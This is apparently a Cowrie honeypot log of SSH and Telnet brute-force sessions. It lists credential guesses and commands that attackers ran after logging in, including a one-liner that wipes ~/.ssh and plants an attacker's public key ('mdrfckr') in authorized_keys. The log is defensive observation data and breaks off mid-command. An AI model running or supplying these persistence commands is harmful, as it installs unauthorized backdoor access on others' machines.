{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:58:37.479391Z","src_ip":"212.227.235.229","session":"ffddb69d1502"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:58:37.656759Z","src_ip":"212.227.235.229","session":"ffddb69d1502"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:58:38.664061Z","src_ip":"212.227.235.229","session":"ffddb69d1502"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:58:39.843862Z","src_ip":"212.227.235.229","session":"ffddb69d1502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58356,"dst_ip":"1.2.3.4","dst_port":22,"session":"a96e7d3a0c2b","protocol":"ssh","message":"New connection: 212.227.235.229:58356 (1.2.3.4:22) [session: a96e7d3a0c2b]","sensor":"my-vps","timestamp":"2025-08-28T14:58:45.053188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:58:45.053858Z","src_ip":"212.227.235.229","session":"a96e7d3a0c2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:58:45.238864Z","src_ip":"212.227.235.229","session":"a96e7d3a0c2b"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1qaz@WSX#EDC","message":"login attempt [ubuntu/1qaz@WSX#EDC] failed","sensor":"my-vps","timestamp":"2025-08-28T14:58:46.022875Z","src_ip":"212.227.235.229","session":"a96e7d3a0c2b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:58:47.210157Z","src_ip":"212.227.235.229","session":"a96e7d3a0c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36814,"dst_ip":"1.2.3.4","dst_port":22,"session":"e11dd2daef02","protocol":"ssh","message":"New connection: 212.227.125.160:36814 (1.2.3.4:22) [session: e11dd2daef02]","sensor":"my-vps","timestamp":"2025-08-28T14:59:22.774285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:59:22.775258Z","src_ip":"212.227.125.160","session":"e11dd2daef02"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T14:59:22.824930Z","src_ip":"212.227.125.160","session":"e11dd2daef02"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-28T14:59:22.976831Z","src_ip":"212.227.125.160","session":"e11dd2daef02"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:59:24.028616Z","src_ip":"212.227.125.160","session":"e11dd2daef02"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61466,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3d490d9d79","protocol":"ssh","message":"New connection: 217.72.205.35:61466 (1.2.3.4:22) [session: fe3d490d9d79]","sensor":"my-vps","timestamp":"2025-08-28T14:59:38.734320Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:59:38.735384Z","src_ip":"217.72.205.35","session":"fe3d490d9d79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56702,"dst_ip":"1.2.3.4","dst_port":22,"session":"eac88e2f6713","protocol":"ssh","message":"New connection: 212.227.235.229:56702 (1.2.3.4:22) [session: eac88e2f6713]","sensor":"my-vps","timestamp":"2025-08-28T14:59:55.336812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:59:55.337716Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:59:55.522724Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#QWE123","message":"login attempt [root/!@#QWE123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:59:56.295687Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:59:56.677351Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:59:56.678103Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:59:56.679198Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:59:56.864147Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:59:57.720609Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:59:57.721329Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:59:57.906961Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:59:57.908037Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57372,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a6db8a4b8f","protocol":"ssh","message":"New connection: 212.227.235.229:57372 (1.2.3.4:22) [session: 76a6db8a4b8f]","sensor":"my-vps","timestamp":"2025-08-28T14:59:58.084653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:59:58.085536Z","src_ip":"212.227.235.229","session":"76a6db8a4b8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:59:58.266417Z","src_ip":"212.227.235.229","session":"76a6db8a4b8f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:59:59.029529Z","src_ip":"212.227.235.229","session":"76a6db8a4b8f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:00.213012Z","src_ip":"212.227.235.229","session":"76a6db8a4b8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58372,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee9388b1f66","protocol":"ssh","message":"New connection: 212.227.235.229:58372 (1.2.3.4:22) [session: aee9388b1f66]","sensor":"my-vps","timestamp":"2025-08-28T15:00:00.400466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:00:00.401569Z","src_ip":"212.227.235.229","session":"aee9388b1f66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:00:00.587577Z","src_ip":"212.227.235.229","session":"aee9388b1f66"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:00:01.376060Z","src_ip":"212.227.235.229","session":"aee9388b1f66"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:01.566534Z","src_ip":"212.227.235.229","session":"eac88e2f6713"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:01.568693Z","src_ip":"212.227.235.229","session":"aee9388b1f66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52144,"dst_ip":"1.2.3.4","dst_port":23,"session":"22604c103865","protocol":"telnet","message":"New connection: 212.227.235.229:52144 (1.2.3.4:23) [session: 22604c103865]","sensor":"my-vps","timestamp":"2025-08-28T15:00:09.790843Z"}
{"eventid":"cowrie.session.closed","duration":1.3960492610931396,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:11.186825Z","src_ip":"212.227.235.229","session":"22604c103865"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52150,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d8d2d62daf3","protocol":"telnet","message":"New connection: 212.227.235.229:52150 (1.2.3.4:23) [session: 0d8d2d62daf3]","sensor":"my-vps","timestamp":"2025-08-28T15:00:11.405967Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:00:11.913520Z","src_ip":"212.227.235.229","session":"0d8d2d62daf3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:00:11.940083Z","src_ip":"212.227.235.229","session":"0d8d2d62daf3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T15:00:12.188674Z","src_ip":"212.227.235.229","session":"0d8d2d62daf3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:13.391541Z","src_ip":"212.227.235.229","session":"0d8d2d62daf3"}
{"eventid":"cowrie.session.closed","duration":1.9900989532470703,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:00:13.395989Z","src_ip":"212.227.235.229","session":"0d8d2d62daf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55084,"dst_ip":"1.2.3.4","dst_port":22,"session":"74555258c1f2","protocol":"ssh","message":"New connection: 212.227.235.229:55084 (1.2.3.4:22) [session: 74555258c1f2]","sensor":"my-vps","timestamp":"2025-08-28T15:01:05.235860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:01:05.236952Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:01:05.422503Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qwer1234","message":"login attempt [root/!Qwer1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:01:06.204139Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:01:06.594147Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:01:06.594937Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:01:06.596429Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:06.783501Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:01:07.217228Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 